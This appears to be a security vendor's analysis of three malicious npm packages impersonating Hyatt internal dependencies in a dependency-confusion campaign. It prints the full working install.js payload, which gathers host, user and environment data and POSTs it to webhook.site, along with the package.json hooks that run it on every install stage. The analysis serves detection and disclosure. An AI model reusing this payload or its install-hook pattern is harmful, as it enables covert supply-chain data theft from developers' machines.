Malicious npm Packages Impersonating Hyatt Internal Dependencies

TL;DR

Three malicious npm packages disguised as Hyatt internal dependencies were discovered on the npm registry, all published on October 23, 2025. The packages hyatt-residential-roster, hyatt-album, and hyatt-avatar share identical attack patterns and infrastructure, suggesting a coordinated campaign targeting internal applications at Hyatt.

All three packages use the suspicious version number 999.999.999, execute identical install hooks across all three npm lifecycle events (preinstall, install, postinstall), and claim to be published by “Hyatt IT Security Research”, a likely impersonation tactic to appear legitimate.

Note: High version numbers such as 999.999.999 are typically used for exploiting Dependency Confusion vulnerabilities.

All three packages share the following suspicious indicators:

• Abnormal version number: 999.999.999 - typically used for testing or placeholder purposes
• Multiple identical install hooks: All three packages execute node install.js during preinstall, install, and postinstall lifecycle events
• Minimal package size: Between 851-897 bytes compressed, with only 3 files each
• Same maintainer: Published by pkgpusher6 (jaddyday2@gmail.com)
• Generic author attribution: All claim to be by “Hyatt IT Security Research”
• Same publication date: All published on October 23, 2025

Technical Analysis

Install Hook Exploitation

Unlike many malicious packages that use post-install hooks exclusively, this campaign employs a triple-hook strategy:

1
{
2
  "scripts": {
3
    "preinstall": "node install.js",
4
    "install": "node install.js",
5
    "postinstall": "node install.js"
6
  }
7
}

This ensures the malicious payload executes at multiple points during the installation process, increasing the likelihood of successful compromise even if developers attempt to skip certain lifecycle hooks.

Malicious Payload Structure

Each package contains three files with the following structure:

package.json - Defines the triple install hook strategy:

1
{
2
  "name": "hyatt-album",
3
  "version": "999.999.999",
4
  "description": "Hyatt album management system - Internal dependency",
5
  "main": "index.js",
6
  "scripts": {
7
    "install": "node install.js",
8
    "postinstall": "node install.js",
9
    "preinstall": "node install.js"
10
  },
11
  "keywords": ["hyatt", "album", "media", "internal"],
12
  "author": "Hyatt IT Security Research",
13
  "license": "ISC"
14
}

index.js - Minimal stub file (~67-80 bytes) that provides no actual functionality, serving only to make the package appear legitimate:

1
module.exports = function () {
2
  console.log('Hyatt Album loaded');
3
};

install.js - The malicious payload (~823-836 bytes) that executes during installation:

1
const os = require('os');
2
const { execSync } = require('child_process');
3
const https = require('https');
4

5
console.log('🏨 Hyatt Residential Roster Loading...');
6

7
const data = {
8
  package: 'hyatt-album',
9
  timestamp: new Date().toISOString(),
10
  hostname: os.hostname(),
11
  platform: os.platform(),
12
  uptime: Math.floor(os.uptime()),
13
  user: os.userInfo(),
14
  env: {
15
    hyatt_vars: Object.keys(process.env).filter((k) => k.toLowerCase().includes('hyatt')),
16
    node_env: process.env.NODE_ENV,
17
    kubernetes: process.env.KUBERNETES_SERVICE_HOST,
18
    aws_region: process.env.AWS_REGION,
19
    npm_registry: process.env.npm_config_registry,
20
  },
21
};
22

23
const req = https.request('https://webhook.site/hyatt', {
24
  method: 'POST',
25
  headers: { 'Content-Type': 'application/json' },
26
});
27
req.write(JSON.stringify(data, null, 2));
28
req.end();

The code performs the following malicious actions:

1. Imports Node.js modules: os, child_process, https
2. Collects comprehensive system information using os module methods
3. Specifically targets environment variables to identify the infrastructure the application is running on
4. Exfiltrates environment containing the keyword hyatt
5. Serializes collected data to JSON format with pretty printing
6. Sends data via HTTPS POST to https://webhook.site/hyatt
7. Executes silently without user notification, disguised as a loading message

Data Exfiltration to External Server

All three packages contain code that collects system information and exfiltrates it to https://webhook.site/hyatt to identify the infrastructure the application is running on. The collected data includes:

• System information: hostname, platform, uptime, total memory
• User information: username and user details from os.userInfo()
• Environment variables: Specifically targeting:
  • Variables containing ‘hyatt’
  • NODE_ENV
  • KUBERNETES_SERVICE_HOST (Kubernetes deployments)
  • AWS_REGION (AWS cloud environments)
  • npm_config_registry (npm configuration)
• Package metadata: Package name and installation timestamp
• File system paths: Current working directory, home directory

The exfiltration occurs via HTTPS POST request to webhook.site, which is a public service often used for testing webhooks, making it convenient for attackers to collect data without setting up their own infrastructure.

Conclusion

This coordinated campaign of three malicious npm packages demonstrates a common approach to dependency confusion attacks through corporate package impersonation. Analysis of the data exfiltration patterns reveals a targeted focus on specific infrastructure indicators rather than comprehensive credential harvesting, suggesting this may represent a penetration testing exercise specific to Hyatt.

The exfiltrated data is notably limited in scope, collecting only:

• KUBERNETES_SERVICE_HOST - indicating Kubernetes deployment environments
• AWS_REGION - identifying AWS cloud infrastructure presence
• npm_config_registry - revealing npm registry configuration
• Environment variables containing the keyword hyatt

Stay Protected: Learn more about SafeDep’s malicious package detection at safedep.io or try our free tool vet today.